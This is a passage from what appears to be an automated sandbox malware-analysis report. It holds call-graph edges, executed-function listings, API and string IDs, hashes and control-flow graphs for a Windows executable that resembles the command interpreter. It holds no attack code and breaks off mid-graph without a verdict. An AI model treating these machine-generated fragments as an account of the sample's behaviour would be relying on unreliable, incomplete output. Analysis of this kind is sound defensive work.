21076->21081 21077->21067 21077->21068 21077->21070 21077->21071 21077->21072 21077->21074 21083 7ff6eb17986d 21077->21083 21084 7ff6eb1796b4 186 API calls 21077->21084 21104 7ff6eb181fac memset 21077->21104 21131 7ff6eb17ce10 21077->21131 21181 7ff6eb185920 21077->21181 21187 7ff6eb197694 21078->21187 21081->21078 21085 7ff6eb17988c 21083->21085 21086 7ff6eb179880 ??_V@YAXPEAX 21083->21086 21084->21077 21087 7ff6eb188f80 7 API calls 21085->21087 21086->21085 21088 7ff6eb17989d 21087->21088 21088->20879 21091 7ff6eb183a90 170 API calls 21090->21091 21092 7ff6eb199064 21091->21092 21093 7ff6eb19906e 21092->21093 21094 7ff6eb199083 21092->21094 21095 7ff6eb18498c 8 API calls 21093->21095 21097 7ff6eb17cd90 166 API calls 21094->21097 21096 7ff6eb199081 21095->21096 21096->21019 21098 7ff6eb19909b 21097->21098 21098->21096 21099 7ff6eb18498c 8 API calls 21098->21099 21100 7ff6eb1990ec 21099->21100 21101 7ff6eb17ff70 2 API calls 21100->21101 21101->21096 21103 7ff6eb18ed0a DeleteProcThreadAttributeList 21102->21103 21103->21010 21105 7ff6eb18203b 21104->21105 21106 7ff6eb1820b0 21105->21106 21107 7ff6eb182094 21105->21107 21108 7ff6eb183060 171 API calls 21106->21108 21109 7ff6eb18211c 21106->21109 21110 7ff6eb1820a6 21107->21110 21111 7ff6eb173278 166 API calls 21107->21111 21108->21109 21109->21110 21112 7ff6eb182e44 2 API calls 21109->21112 21113 7ff6eb188f80 7 API calls 21110->21113 21111->21110 21115 7ff6eb182148 21112->21115 21114 7ff6eb182325 21113->21114 21114->21077 21115->21110 21116 7ff6eb182d70 3 API calls 21115->21116 21117 7ff6eb1821af 21116->21117 21118 7ff6eb17b900 166 API calls 21117->21118 21120 7ff6eb1821d0 21118->21120 21119 7ff6eb18e04a ??_V@YAXPEAX 21119->21110 21120->21119 21121 7ff6eb18221c wcsspn 21120->21121 21129 7ff6eb1822a4 ??_V@YAXPEAX 21120->21129 21123 7ff6eb17b900 166 API calls 21121->21123 21124 7ff6eb18223b 21123->21124 21124->21119 21127 7ff6eb182252 21124->21127 21125 7ff6eb17d3f0 223 API calls 21125->21129 21126 7ff6eb18e06d wcschr 21126->21127 21127->21126 21128 7ff6eb18e090 towupper 21127->21128 21130 7ff6eb18228f 21127->21130 21128->21127 21128->21130 21129->21110 21130->21125 21132 7ff6eb17d0f8 21131->21132 21152 7ff6eb17ce5b 21131->21152 21134 7ff6eb188f80 7 API calls 21132->21134 21133 7ff6eb18c860 21135 7ff6eb18c97c 21133->21135 21138 7ff6eb19ee88 390 API calls 21133->21138 21136 7ff6eb17d10a 21134->21136 21139 7ff6eb19e9b4 197 API calls 21135->21139 21136->21077 21137 7ff6eb180494 182 API calls 21137->21152 21140 7ff6eb18c879 21138->21140 21141 7ff6eb18c981 longjmp 21139->21141 21142 7ff6eb18c882 EnterCriticalSection LeaveCriticalSection 21140->21142 21143 7ff6eb18c95c 21140->21143 21144 7ff6eb18c99a 21141->21144 21149 7ff6eb17d0e3 21142->21149 21143->21135 21147 7ff6eb1796b4 186 API calls 21143->21147 21144->21132 21146 7ff6eb18c9b3 ??_V@YAXPEAX 21144->21146 21146->21132 21147->21143 21148 7ff6eb17ceaa _tell 21151 7ff6eb17d208 _close 21148->21151 21149->21077 21150 7ff6eb17cd90 166 API calls 21150->21152 21151->21152 21152->21132 21152->21133 21152->21137 21152->21144 21152->21149 21152->21150 21153 7ff6eb18c9d5 21152->21153 21155 7ff6eb17b900 166 API calls 21152->21155 21162 7ff6eb17cf33 memset 21152->21162 21164 7ff6eb17ca40 17 API calls 21152->21164 21165 7ff6eb19bfec 176 API calls 21152->21165 21166 7ff6eb17d184 wcschr 21152->21166 21167 7ff6eb18c9c9 21152->21167 21168 7ff6eb17d1a7 wcschr 21152->21168 21170 7ff6eb19778c 166 API calls 21152->21170 21171 7ff6eb180a6c 273 API calls 21152->21171 21172 7ff6eb17be00 635 API calls 21152->21172 21173 7ff6eb183448 166 API calls 21152->21173 21174 7ff6eb180580 12 API calls 21152->21174 21175 7ff6eb17cfab _wcsicmp 21152->21175 21178 7ff6eb181fac 238 API calls 21152->21178 21180 7ff6eb17d044 ??_V@YAXPEAX 21152->21180 21193 7ff6eb17df60 21152->21193 21213 7ff6eb19c738 21152->21213 21154 7ff6eb19d610 167 API calls 21153->21154 21156 7ff6eb18c9da 21154->21156 21155->21152 21157 7ff6eb18ca07 21156->21157 21159 7ff6eb19bfec 176 API calls 21156->21159 21158 7ff6eb19e91c 198 API calls 21157->21158 21161 7ff6eb18ca0c 21158->21161 21160 7ff6eb18c9f1 21159->21160 21163 7ff6eb173240 166 API calls 21160->21163 21161->21077 21162->21152 21163->21157 21164->21152 21165->21152 21166->21152 21169 7ff6eb18855c ??_V@YAXPEAX 21167->21169 21168->21152 21169->21132 21170->21152 21171->21152 21172->21152 21173->21152 21176 7ff6eb17d003 GetConsoleOutputCP GetCPInfo 21174->21176 21175->21152 21177 7ff6eb1804f4 3 API calls 21176->21177 21177->21152 21178->21152 21180->21152 21182 7ff6eb18596c 21181->21182 21183 7ff6eb185a12 21181->21183 21182->21183 21184 7ff6eb18598d VirtualQuery 21182->21184 21183->21077 21184->21183 21186 7ff6eb1859ad 21184->21186 21185 7ff6eb1859b7 VirtualQuery 21185->21183 21185->21186 21186->21183 21186->21185 21188 7ff6eb1976a3 21187->21188 21189 7ff6eb1976b7 21188->21189 21191 7ff6eb1796b4 186 API calls 21188->21191 21190 7ff6eb19e9b4 197 API calls 21189->21190 21192 7ff6eb1976bc longjmp 21190->21192 21191->21188 21194 7ff6eb17df93 21193->21194 21195 7ff6eb17dfe2 21193->21195 21194->21195 21196 7ff6eb17df9f GetProcessHeap RtlFreeHeap 21194->21196 21197 7ff6eb17e100 VirtualFree 21195->21197 21198 7ff6eb17e00b _setjmp 21195->21198 21196->21194 21196->21195 21197->21195 21199 7ff6eb17e04a 21198->21199 21206 7ff6eb17e0c3 21198->21206 21200 7ff6eb17e600 473 API calls 21199->21200 21201 7ff6eb17e073 21200->21201 21202 7ff6eb17e081 21201->21202 21203 7ff6eb17e0e0 longjmp 21201->21203 21204 7ff6eb17d250 475 API calls 21202->21204 21205 7ff6eb17e0b0 21203->21205 21207 7ff6eb17e086 21204->21207 21205->21206 21223 7ff6eb19d3fc 21205->21223 21206->21148 21207->21205 21210 7ff6eb17e600 473 API calls 21207->21210 21211 7ff6eb17e0a7 21210->21211 21211->21205 21212 7ff6eb19d610 167 API calls 21211->21212 21212->21205 21214 7ff6eb19c775 21213->21214 21219 7ff6eb19c7ab 21213->21219 21215 7ff6eb17cd90 166 API calls 21214->21215 21217 7ff6eb19c781 21215->21217 21216 7ff6eb19c8d4 21216->21152 21217->21216 21218 7ff6eb17b0d8 194 API calls 21217->21218 21218->21216 21219->21216 21219->21217 21220 7ff6eb17b6b0 170 API calls 21219->21220 21221 7ff6eb17b038 _dup2 21219->21221 21222 7ff6eb17d208 _close 21219->21222 21220->21219 21221->21219 21222->21219 21237 7ff6eb19d419 21223->21237 21224 7ff6eb18cadf 21225 7ff6eb19d576 21226 7ff6eb19d592 21225->21226 21239 7ff6eb19d555 21225->21239 21228 7ff6eb183448 166 API calls 21226->21228 21227 7ff6eb19d5c4 21230 7ff6eb183448 166 API calls 21227->21230 21232 7ff6eb19d5a5 21228->21232 21229 7ff6eb19d541 21229->21226 21233 7ff6eb19d546 21229->21233 21230->21224 21234 7ff6eb19d5ba 21232->21234 21235 7ff6eb183448 166 API calls 21232->21235 21233->21227 21233->21239 21241 7ff6eb19d36c 21234->21241 21235->21234 21237->21224 21237->21225 21237->21226 21237->21227 21237->21229 21238 7ff6eb183448 166 API calls 21237->21238 21237->21239 21240 7ff6eb19d3fc 166 API calls 21237->21240 21238->21237 21248 7ff6eb19d31c 21239->21248 21240->21237 21242 7ff6eb19d381 21241->21242 21243 7ff6eb19d3d8 21241->21243 21244 7ff6eb1834a0 166 API calls 21242->21244 21246 7ff6eb19d390 21244->21246 21245 7ff6eb183448 166 API calls 21245->21246 21246->21243 21246->21245 21247 7ff6eb1834a0 166 API calls 21246->21247 21247->21246 21249 7ff6eb183448 166 API calls 21248->21249 21250 7ff6eb19d33b 21249->21250 21251 7ff6eb19d36c 166 API calls 21250->21251 21252 7ff6eb19d343 21251->21252 21253 7ff6eb19d3fc 166 API calls 21252->21253 21270 7ff6eb19d34e 21253->21270 21254 7ff6eb19d5c2 21254->21224 21255 7ff6eb19d576 21256 7ff6eb19d592 21255->21256 21268 7ff6eb19d555 21255->21268 21258 7ff6eb183448 166 API calls 21256->21258 21257 7ff6eb19d5c4 21260 7ff6eb183448 166 API calls 21257->21260 21262 7ff6eb19d5a5 21258->21262 21259 7ff6eb19d541 21259->21256 21263 7ff6eb19d546 21259->21263 21260->21254 21261 7ff6eb19d31c 166 API calls 21261->21254 21264 7ff6eb19d5ba 21262->21264 21265 7ff6eb183448 166 API calls 21262->21265 21263->21257 21263->21268 21266 7ff6eb19d36c 166 API calls 21264->21266 21265->21264 21266->21254 21267 7ff6eb183448 166 API calls 21267->21270 21268->21261 21269 7ff6eb19d3fc 166 API calls 21269->21270 21270->21254 21270->21255 21270->21256 21270->21257 21270->21259 21270->21267 21270->21268 21270->21269 21272 7ff6eb17c4c9 21271->21272 21273 7ff6eb17c486 21271->21273 21276 7ff6eb17ff70 2 API calls 21272->21276 21278 7ff6eb17c161 21272->21278 21274 7ff6eb17c48e wcschr 21273->21274 21273->21278 21275 7ff6eb17c4ef 21274->21275 21274->21278 21277 7ff6eb17cd90 166 API calls 21275->21277 21276->21278 21284 7ff6eb17c4f9 21277->21284 21278->20889 21278->20909 21279 7ff6eb17c541 21279->21278 21281 7ff6eb17ff70 2 API calls 21279->21281 21280 7ff6eb17d840 178 API calls 21280->21284 21281->21278 21282 7ff6eb17b6b0 170 API calls 21282->21279 21283 7ff6eb17c5bd 21283->21279 21283->21282 21284->21278 21284->21279 21284->21280 21284->21283 21285->20946 21287 7ff6eb194621 21286->21287 21288 7ff6eb1772de 21286->21288 21290 7ff6eb19447b longjmp 21287->21290 21293 7ff6eb194639 21287->21293 21303 7ff6eb19475e 21287->21303 21311 7ff6eb1947e0 21287->21311 21289 7ff6eb1772eb 21288->21289 21297 7ff6eb194530 21288->21297 21298 7ff6eb194467 21288->21298 21347 7ff6eb177348 21289->21347 21294 7ff6eb194492 21290->21294 21292 7ff6eb177348 168 API calls 21296 7ff6eb194524 21292->21296 21299 7ff6eb19463e 21293->21299 21300 7ff6eb194695 21293->21300 21301 7ff6eb177348 168 API calls 21294->21301 21308 7ff6eb1772b0 168 API calls 21296->21308 21315 7ff6eb177323 21296->21315 21302 7ff6eb177348 168 API calls 21297->21302 21298->21289 21298->21294 21305 7ff6eb194475 21298->21305 21299->21290 21312 7ff6eb194654 21299->21312 21310 7ff6eb1773d4 168 API calls 21300->21310 21321 7ff6eb1944a8 21301->21321 21323 7ff6eb194549 21302->21323 21306 7ff6eb177348 168 API calls 21303->21306 21304 7ff6eb177315 21362 7ff6eb1773d4 21304->21362 21305->21290 21305->21300 21306->21311 21307 7ff6eb177348 168 API calls 21307->21304 21314 7ff6eb19480e 21308->21314 21325 7ff6eb19469a 21310->21325 21311->21292 21324 7ff6eb177348 168 API calls 21312->21324 21313 7ff6eb1945b2 21316 7ff6eb177348 168 API calls 21313->21316 21314->20984 21315->20984 21320 7ff6eb1945c7 21316->21320 21317 7ff6eb19455e 21317->21313 21326 7ff6eb177348 168 API calls 21317->21326 21318 7ff6eb1946e1 21319 7ff6eb1772b0 168 API calls 21318->21319 21330 7ff6eb194738 21319->21330 21327 7ff6eb177348 168 API calls 21320->21327 21322 7ff6eb1944e2 21321->21322 21328 7ff6eb177348 168 API calls 21321->21328 21329 7ff6eb1772b0 168 API calls 21322->21329 21323->21313 21323->21317 21336 7ff6eb177348 168 API calls 21323->21336 21324->21315 21325->21318 21337 7ff6eb1946c7 21325->21337 21338 7ff6eb1946ea 21325->21338 21326->21313 21332 7ff6eb1945db 21327->21332 21328->21322 21333 7ff6eb1944f1 21329->21333 21331 7ff6eb177348 168 API calls 21330->21331 21331->21296 21334 7ff6eb177348 168 API calls 21332->21334 21335 7ff6eb1772b0 168 API calls 21333->21335 21339 7ff6eb1945ec 21334->21339 21340 7ff6eb194503 21335->21340 21336->21317 21337->21318 21344 7ff6eb177348 168 API calls 21337->21344 21341 7ff6eb177348 168 API calls 21338->21341 21342 7ff6eb177348 168 API calls 21339->21342 21340->21315 21343 7ff6eb177348 168 API calls 21340->21343 21341->21318 21345 7ff6eb194600 21342->21345 21343->21296 21344->21318 21346 7ff6eb177348 168 API calls 21345->21346 21346->21296 21355 7ff6eb17735d 21347->21355 21348 7ff6eb173278 166 API calls 21349 7ff6eb194820 longjmp 21348->21349 21350 7ff6eb194838 21349->21350 21351 7ff6eb173278 166 API calls 21350->21351 21352 7ff6eb194844 longjmp 21351->21352 21353 7ff6eb19485a 21352->21353 21354 7ff6eb177348 166 API calls 21353->21354 21356 7ff6eb19487b 21354->21356 21355->21348 21355->21350 21361 7ff6eb1773ab 21355->21361 21357 7ff6eb177348 166 API calls 21356->21357 21358 7ff6eb1948ad 21357->21358 21359 7ff6eb177348 166 API calls 21358->21359 21360 7ff6eb1772ff 21359->21360 21360->21304 21360->21307 21363 7ff6eb177401 21362->21363 21363->21315 21364 7ff6eb177348 168 API calls 21363->21364 21365 7ff6eb19487b 21364->21365 21366 7ff6eb177348 168 API calls 21365->21366 21367 7ff6eb1948ad 21366->21367 21368 7ff6eb177348 168 API calls 21367->21368 21369 7ff6eb1948be 21368->21369 21369->21315

                                              Executed Functions

                                              Function 00007FF6EB180A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                              • API String ID: 3305344409-4288247545
                                              • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction ID: b3710c31083e347f1a9af0162cfae7917129b6058f80b41ba211ac143c5603fd
                                              • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction Fuzzy Hash: 1942A123A0878285EA609B2198543F967A1BF8DBB8F544135DD1ECB7F4DF3EE544830A
                                              Function 00007FF6EB17AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 7ff6eb17aa54-7ff6eb17aa98 call 7ff6eb17cd90 219 7ff6eb18bf5a-7ff6eb18bf70 call 7ff6eb184c1c call 7ff6eb17ff70 216->219 220 7ff6eb17aa9e 216->220 221 7ff6eb17aaa5-7ff6eb17aaa8 220->221 223 7ff6eb17acde-7ff6eb17ad00 221->223 224 7ff6eb17aaae-7ff6eb17aac8 wcschr 221->224 230 7ff6eb17ad06 223->230 224->223 227 7ff6eb17aace-7ff6eb17aae9 towlower 224->227 227->223 229 7ff6eb17aaef-7ff6eb17aaf3 227->229 233 7ff6eb17aaf9-7ff6eb17aafd 229->233 234 7ff6eb18beb7-7ff6eb18bec4 call 7ff6eb19eaf0 229->234 231 7ff6eb17ad0d-7ff6eb17ad1f 230->231 237 7ff6eb17ad22-7ff6eb17ad2a call 7ff6eb1813e0 231->237 235 7ff6eb18bbcf 233->235 236 7ff6eb17ab03-7ff6eb17ab07 233->236 246 7ff6eb18bf43-7ff6eb18bf59 call 7ff6eb184c1c 234->246 247 7ff6eb18bec6-7ff6eb18bed8 call 7ff6eb173240 234->247 249 7ff6eb18bbde 235->249 239 7ff6eb17ab7d-7ff6eb17ab81 236->239 240 7ff6eb17ab09-7ff6eb17ab0d 236->240 237->221 243 7ff6eb18be63 239->243 248 7ff6eb17ab87-7ff6eb17ab95 239->248 240->243 244 7ff6eb17ab13-7ff6eb17ab17 240->244 255 7ff6eb18be72-7ff6eb18be88 call 7ff6eb173278 call 7ff6eb184c1c 243->255 244->239 250 7ff6eb17ab19-7ff6eb17ab1d 244->250 246->219 247->246 263 7ff6eb18beda-7ff6eb18bee9 call 7ff6eb173240 247->263 253 7ff6eb17ab98-7ff6eb17aba0 248->253 259 7ff6eb18bbea-7ff6eb18bbec 249->259 250->249 254 7ff6eb17ab23-7ff6eb17ab27 250->254 253->253 258 7ff6eb17aba2-7ff6eb17abb3 call 7ff6eb17cd90 253->258 254->259 261 7ff6eb17ab2d-7ff6eb17ab31 254->261 283 7ff6eb18be89-7ff6eb18be8c 255->283 258->219 269 7ff6eb17abb9-7ff6eb17abde call 7ff6eb1813e0 call 7ff6eb1833a8 258->269 265 7ff6eb18bbf8-7ff6eb18bc01 259->265 261->230 266 7ff6eb17ab37-7ff6eb17ab3b 261->266 277 7ff6eb18bef3-7ff6eb18bef9 263->277 278 7ff6eb18beeb-7ff6eb18bef1 263->278 265->231 266->265 270 7ff6eb17ab41-7ff6eb17ab45 266->270 305 7ff6eb17ac75 269->305 306 7ff6eb17abe4-7ff6eb17abe7 269->306 274 7ff6eb17ab4b-7ff6eb17ab4f 270->274 275 7ff6eb18bc06-7ff6eb18bc2a call 7ff6eb1813e0 270->275 281 7ff6eb17ab55-7ff6eb17ab78 call 7ff6eb1813e0 274->281 282 7ff6eb17ad2f-7ff6eb17ad33 274->282 294 7ff6eb18bc5a-7ff6eb18bc61 275->294 295 7ff6eb18bc2c-7ff6eb18bc4c _wcsnicmp 275->295 277->246 284 7ff6eb18befb-7ff6eb18bf0d call 7ff6eb173240 277->284 278->246 278->277 281->221 288 7ff6eb17ad39-7ff6eb17ad3d 282->288 289 7ff6eb18bc66-7ff6eb18bc8a call 7ff6eb1813e0 282->289 291 7ff6eb18be92-7ff6eb18beaa call 7ff6eb173278 call 7ff6eb184c1c 283->291 292 7ff6eb17acbe 283->292 284->246 303 7ff6eb18bf0f-7ff6eb18bf21 call 7ff6eb173240 284->303 297 7ff6eb18bcde-7ff6eb18bd02 call 7ff6eb1813e0 288->297 298 7ff6eb17ad43-7ff6eb17ad49 288->298 324 7ff6eb18bcc4-7ff6eb18bcdc 289->324 325 7ff6eb18bc8c-7ff6eb18bcaa _wcsnicmp 289->325 337 7ff6eb18beab-7ff6eb18beb6 call 7ff6eb184c1c 291->337 301 7ff6eb17acc0-7ff6eb17acc7 292->301 309 7ff6eb18bd31-7ff6eb18bd4f _wcsnicmp 294->309 295->294 304 7ff6eb18bc4e-7ff6eb18bc55 295->304 328 7ff6eb18bd04-7ff6eb18bd24 _wcsnicmp 297->328 329 7ff6eb18bd2a 297->329 307 7ff6eb18bd5e-7ff6eb18bd65 298->307 308 7ff6eb17ad4f-7ff6eb17ad68 298->308 301->301 311 7ff6eb17acc9-7ff6eb17acda 301->311 303->246 339 7ff6eb18bf23-7ff6eb18bf35 call 7ff6eb173240 303->339 319 7ff6eb18bbb3-7ff6eb18bbb7 304->319 316 7ff6eb17ac77-7ff6eb17ac7f 305->316 306->292 321 7ff6eb17abed-7ff6eb17ac0b call 7ff6eb17cd90 * 2 306->321 307->308 320 7ff6eb18bd6b-7ff6eb18bd73 307->320 322 7ff6eb17ad6d-7ff6eb17ad70 308->322 323 7ff6eb17ad6a 308->323 317 7ff6eb18bbc2-7ff6eb18bbca 309->317 318 7ff6eb18bd55 309->318 311->223 316->292 335 7ff6eb17ac81-7ff6eb17ac85 316->335 317->221 318->307 330 7ff6eb18bbba-7ff6eb18bbbd call 7ff6eb1813e0 319->330 331 7ff6eb18bd79-7ff6eb18bd8b iswxdigit 320->331 332 7ff6eb18be4a-7ff6eb18be5e 320->332 321->337 356 7ff6eb17ac11-7ff6eb17ac14 321->356 322->237 323->322 324->309 325->324 336 7ff6eb18bcac-7ff6eb18bcbf 325->336 328->329 338 7ff6eb18bbac 328->338 329->309 330->317 331->332 342 7ff6eb18bd91-7ff6eb18bda3 iswxdigit 331->342 332->330 340 7ff6eb17ac88-7ff6eb17ac8f 335->340 336->319 337->234 338->319 339->246 357 7ff6eb18bf37-7ff6eb18bf3e call 7ff6eb173240 339->357 340->340 348 7ff6eb17ac91-7ff6eb17ac94 340->348 342->332 345 7ff6eb18bda9-7ff6eb18bdbb iswxdigit 342->345 345->332 352 7ff6eb18bdc1-7ff6eb18bdd7 iswdigit 345->352 348->292 351 7ff6eb17ac96-7ff6eb17acaa wcsrchr 348->351 351->292 358 7ff6eb17acac-7ff6eb17acb9 call 7ff6eb181300 351->358 354 7ff6eb18bddf-7ff6eb18bdeb towlower 352->354 355 7ff6eb18bdd9-7ff6eb18bddd 352->355 361 7ff6eb18bdee-7ff6eb18be0f iswdigit 354->361 355->361 356->337 362 7ff6eb17ac1a-7ff6eb17ac33 memset 356->362 357->246 358->292 363 7ff6eb18be11-7ff6eb18be15 361->363 364 7ff6eb18be17-7ff6eb18be23 towlower 361->364 362->305 365 7ff6eb17ac35-7ff6eb17ac4b wcschr 362->365 366 7ff6eb18be26-7ff6eb18be45 call 7ff6eb1813e0 363->366 364->366 365->305 367 7ff6eb17ac4d-7ff6eb17ac54 365->367 366->332 368 7ff6eb17ac5a-7ff6eb17ac6f wcschr 367->368 369 7ff6eb17ad72-7ff6eb17ad91 wcschr 367->369 368->305 368->369 371 7ff6eb17ad97-7ff6eb17adac wcschr 369->371 372 7ff6eb17af03-7ff6eb17af07 369->372 371->372 373 7ff6eb17adb2-7ff6eb17adc7 wcschr 371->373 372->305 373->372 374 7ff6eb17adcd-7ff6eb17ade2 wcschr 373->374 374->372 375 7ff6eb17ade8-7ff6eb17adfd wcschr 374->375 375->372 376 7ff6eb17ae03-7ff6eb17ae18 wcschr 375->376 376->372 377 7ff6eb17ae1e-7ff6eb17ae21 376->377 378 7ff6eb17ae24-7ff6eb17ae27 377->378 378->372 379 7ff6eb17ae2d-7ff6eb17ae40 iswspace 378->379 380 7ff6eb17ae4b-7ff6eb17ae5e 379->380 381 7ff6eb17ae42-7ff6eb17ae49 379->381 382 7ff6eb17ae66-7ff6eb17ae6d 380->382 381->378 382->382 383 7ff6eb17ae6f-7ff6eb17ae77 382->383 383->255 384 7ff6eb17ae7d-7ff6eb17ae97 call 7ff6eb1813e0 383->384 387 7ff6eb17ae9a-7ff6eb17aea4 384->387 388 7ff6eb17aebc-7ff6eb17aef8 call 7ff6eb180a6c call 7ff6eb17ff70 * 2 387->388 389 7ff6eb17aea6-7ff6eb17aead 387->389 388->316 397 7ff6eb17aefe 388->397 389->388 390 7ff6eb17aeaf-7ff6eb17aeba 389->390 390->387 390->388 397->283
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                              • String ID: :$:$:$:ON$OFF
                                              • API String ID: 4076514806-467788257
                                              • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction ID: 75b9f229bde4634299c95518699a16c7a41f6f7e85fd7f5e5896d244e9524426
                                              • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction Fuzzy Hash: CB22B223A0865286EB249F21D9543F96691FF4EBA8F488035D90EC77F4DF7FA444834A
                                              Function 00007FF6EB1851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 398 7ff6eb1851ec-7ff6eb185248 call 7ff6eb185508 GetLocaleInfoW 401 7ff6eb18ef32-7ff6eb18ef3c 398->401 402 7ff6eb18524e-7ff6eb185272 GetLocaleInfoW 398->402 403 7ff6eb18ef3f-7ff6eb18ef49 401->403 404 7ff6eb185295-7ff6eb1852b9 GetLocaleInfoW 402->404 405 7ff6eb185274-7ff6eb18527a 402->405 408 7ff6eb18ef61-7ff6eb18ef6c 403->408 409 7ff6eb18ef4b-7ff6eb18ef52 403->409 406 7ff6eb1852bb-7ff6eb1852c3 404->406 407 7ff6eb1852de-7ff6eb185305 GetLocaleInfoW 404->407 410 7ff6eb1854f7-7ff6eb1854f9 405->410 411 7ff6eb185280-7ff6eb185286 405->411 412 7ff6eb1852c9-7ff6eb1852d7 406->412 413 7ff6eb18ef75-7ff6eb18ef78 406->413 414 7ff6eb185307-7ff6eb18531b 407->414 415 7ff6eb185321-7ff6eb185343 GetLocaleInfoW 407->415 408->413 409->408 416 7ff6eb18ef54-7ff6eb18ef5f 409->416 410->401 411->410 417 7ff6eb18528c-7ff6eb18528f 411->417 412->407 420 7ff6eb18ef99-7ff6eb18efa3 413->420 421 7ff6eb18ef7a-7ff6eb18ef7d 413->421 414->415 418 7ff6eb18efaf-7ff6eb18efb9 415->418 419 7ff6eb185349-7ff6eb18536e GetLocaleInfoW 415->419 416->403 416->408 417->404 422 7ff6eb18efbc-7ff6eb18efc6 418->422 423 7ff6eb18eff2-7ff6eb18effc 419->423 424 7ff6eb185374-7ff6eb185396 GetLocaleInfoW 419->424 420->418 421->407 425 7ff6eb18ef83-7ff6eb18ef8d 421->425 426 7ff6eb18efde-7ff6eb18efe9 422->426 427 7ff6eb18efc8-7ff6eb18efcf 422->427 428 7ff6eb18efff-7ff6eb18f009 423->428 429 7ff6eb18539c-7ff6eb1853be GetLocaleInfoW 424->429 430 7ff6eb18f035-7ff6eb18f03f 424->430 425->420 426->423 427->426 431 7ff6eb18efd1-7ff6eb18efdc 427->431 432 7ff6eb18f021-7ff6eb18f02c 428->432 433 7ff6eb18f00b-7ff6eb18f012 428->433 434 7ff6eb1853c4-7ff6eb1853e6 GetLocaleInfoW 429->434 435 7ff6eb18f078-7ff6eb18f082 429->435 436 7ff6eb18f042-7ff6eb18f04c 430->436 431->422 431->426 432->430 433->432 438 7ff6eb18f014-7ff6eb18f01f 433->438 439 7ff6eb1853ec-7ff6eb18540e GetLocaleInfoW 434->439 440 7ff6eb18f0bb-7ff6eb18f0c5 434->440 437 7ff6eb18f085-7ff6eb18f08f 435->437 441 7ff6eb18f04e-7ff6eb18f055 436->441 442 7ff6eb18f064-7ff6eb18f06f 436->442 443 7ff6eb18f091-7ff6eb18f098 437->443 444 7ff6eb18f0a7-7ff6eb18f0b2 437->444 438->428 438->432 446 7ff6eb18f0fe-7ff6eb18f108 439->446 447 7ff6eb185414-7ff6eb185436 GetLocaleInfoW 439->447 445 7ff6eb18f0c8-7ff6eb18f0d2 440->445 441->442 448 7ff6eb18f057-7ff6eb18f062 441->448 442->435 443->444 449 7ff6eb18f09a-7ff6eb18f0a5 443->449 444->440 450 7ff6eb18f0d4-7ff6eb18f0db 445->450 451 7ff6eb18f0ea-7ff6eb18f0f5 445->451 454 7ff6eb18f10b-7ff6eb18f115 446->454 452 7ff6eb18543c-7ff6eb18545e GetLocaleInfoW 447->452 453 7ff6eb18f141-7ff6eb18f14b 447->453 448->436 448->442 449->437 449->444 450->451 456 7ff6eb18f0dd-7ff6eb18f0e8 450->456 451->446 457 7ff6eb18f184-7ff6eb18f18b 452->457 458 7ff6eb185464-7ff6eb185486 GetLocaleInfoW 452->458 455 7ff6eb18f14e-7ff6eb18f158 453->455 459 7ff6eb18f117-7ff6eb18f11e 454->459 460 7ff6eb18f12d-7ff6eb18f138 454->460 462 